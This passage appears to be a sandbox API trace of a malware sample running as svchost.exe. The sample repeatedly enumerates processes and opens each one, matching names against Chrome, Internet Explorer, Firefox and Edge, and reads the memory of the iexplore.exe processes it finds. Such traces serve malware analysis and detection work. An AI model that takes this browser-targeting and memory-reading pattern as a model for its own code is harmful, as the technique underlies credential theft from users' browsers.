	[0244.133] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0244.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.133] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.134] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0244.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8e7c
	[0244.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.135] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0244.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.135] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.136] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0244.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.136] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.136] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0244.137] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8e80
	[0244.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.137] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0244.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.138] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.138] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0244.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.138] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.138] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0244.139] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8e84
	[0244.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.139] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0244.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.140] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.140] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0244.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.150] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.150] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0244.151] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8e88
	[0244.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.151] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0244.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.152] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.152] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0244.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.153] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.154] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0244.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8e8c
	[0244.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.154] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0244.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.155] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.155] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0244.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.157] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.157] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0244.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8e90
	[0244.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.158] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0244.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.159] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.159] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0244.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.160] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.161] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0244.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8e94
	[0244.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.161] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0244.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.162] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.162] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0244.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.163] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.163] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8e98
	[0244.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.164] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0244.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.164] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0244.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.165] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0244.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.165] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.165] NtQueryInformationProcess (in: ProcessHandle=0x8e98, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0244.165] ReadProcessMemory (in: hProcess=0x8e98, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0244.165] ReadProcessMemory (in: hProcess=0x8e98, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0244.166] ReadProcessMemory (in: hProcess=0x8e98, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0244.166] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0244.166] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8e9c
	[0244.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.167] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0244.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.167] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0244.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.167] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0244.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.168] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.168] NtQueryInformationProcess (in: ProcessHandle=0x8e9c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0244.168] ReadProcessMemory (in: hProcess=0x8e9c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0244.168] ReadProcessMemory (in: hProcess=0x8e9c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0244.168] ReadProcessMemory (in: hProcess=0x8e9c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0244.168] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0244.168] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8ea0
	[0244.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.169] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0244.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.170] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.170] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0244.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.170] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0244.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8ea4
	[0244.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.171] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0244.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.182] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.182] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0244.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.182] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.183] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8ea8
	[0244.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.184] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.184] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.184] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.185] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8eac
	[0244.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.186] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.187] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.187] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.188] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8eb0
	[0244.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.189] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.190] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.190] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.191] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.191] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8eb4
	[0244.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.192] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0244.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.192] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.193] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0244.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.193] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.193] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8eb8
	[0244.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.194] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.194] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.195] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.195] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.195] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8ebc
	[0244.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.196] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.197] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.197] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.197] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0244.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8ec0
	[0244.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.198] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0244.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.199] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.199] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0244.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.199] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.200] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0244.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8ec4
	[0244.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.201] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.201] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.202] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.202] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0244.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8ec8
	[0244.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.204] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0244.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.205] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.205] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0244.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.205] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.205] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8ecc
	[0244.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.206] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.207] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.207] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.207] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.207] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0244.208] CloseHandle (hObject=0x4fd0) returned 1
	[0244.208] Sleep (dwMilliseconds=0x64) 
	[0244.315] GetCurrentProcessId () returned 0x110
	[0244.315] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0244.319] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0244.321] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
